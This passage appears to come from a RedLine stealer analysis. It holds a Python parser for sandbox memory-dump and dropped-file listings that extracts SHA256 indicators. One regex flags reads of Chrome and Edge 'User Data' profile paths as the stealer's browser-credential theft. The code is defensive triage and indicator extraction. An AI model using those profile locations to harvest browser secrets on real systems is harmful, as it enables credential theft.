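    r"^memory/(?P<pid>\d+)-(?P<seq>\d+)-0x(?P<start>[0-9A-Fa-f]+)-0x(?P<end>[0-9A-Fa-f]+)-memory\.dmp$"
)
HASH_LENGTHS = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}
# "User Data" followed by any suffix, so renamed copies like "User DataPINGC" match too.
BROWSER_PROFILE_RE = re.compile(r"\\(Google\\Chrome|Microsoft\\Edge)\\User Data", re.IGNORECASE)


@dataclass
class MemoryRegion:
    pid: int
    seq: int
    start: int
    end: int

    @property
    def size(self) -> int:
        return self.end - self.start


@dataclass
class DroppedFile:
    path: str
    hashes: dict = field(default_factory=dict)


def parse_listing(text: str):
    """Return (memory_regions, dropped_files) parsed from the report listing.

    A path line opens a file record; following hash lines attach to it until the
    next path or memory line. Blank lines are separators and carry no meaning.
    """
    regions, files, current = [], [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = MEMDUMP_RE.match(line)
        if m:
            start, end = int(m["start"], 16), int(m["end"], 16)
            if end <= start:
                raise ValueError(f"empty or inverted region: {line}")
            regions.append(MemoryRegion(int(m["pid"]), int(m["seq"]), start, end))
            current = None
            continue
        algo, _, digest = line.partition(" ")
        if algo in HASH_LENGTHS:
            if current is None:
                raise ValueError(f"hash line without a preceding path: {line}")
            if len(digest) != HASH_LENGTHS[algo] or not re.fullmatch(r"[0-9a-fA-F]+", digest):
                raise ValueError(f"malformed {algo} digest for {current.path}: {digest}")
            current.hashes[algo] = digest.lower()
            continue
        current = DroppedFile(path=line)  # any other non-empty line is a path
        files.append(current)
    return regions, files


def regions_by_pid(regions):
    """Group dumped regions by the PID encoded in the dump name."""
    grouped = defaultdict(list)
    for r in regions:
        grouped[r.pid].append(r)
    return dict(grouped)


def browser_profile_files(files):
    """Files under a Chrome/Edge profile directory (the stealer's browser-data reads)."""
    return [f for f in files if BROWSER_PROFILE_RE.search(f.path)]


def sha256_iocs(files):
    """Deduplicated, sorted SHA256 list usable for a hash-based hunt."""
    return sorted({f.hashes["SHA256"] for f in files if "SHA256" in f.hashes})


if __name__ == "__main__":
    regs, fls = parse_listing(SAMPLE_LISTING)
    for pid, rs in regions_by_pid(regs).items():
        print(f"PID {pid}: {len(rs)} regions, {sum(r.size for r in rs):#x} bytes dumped")
    for f in browser_profile_files(fls):
        print(f"browser profile read: {f.path} sha256={f.hashes['SHA256']}")
```

Regions of exactly 0x10000 bytes inside one PID (as for PID 32 above) are typically small heap or section allocations; the multi-megabyte regions at 0x7FF... addresses are mapped images, and those are the ones worth carving for unpacked RedLine configuration.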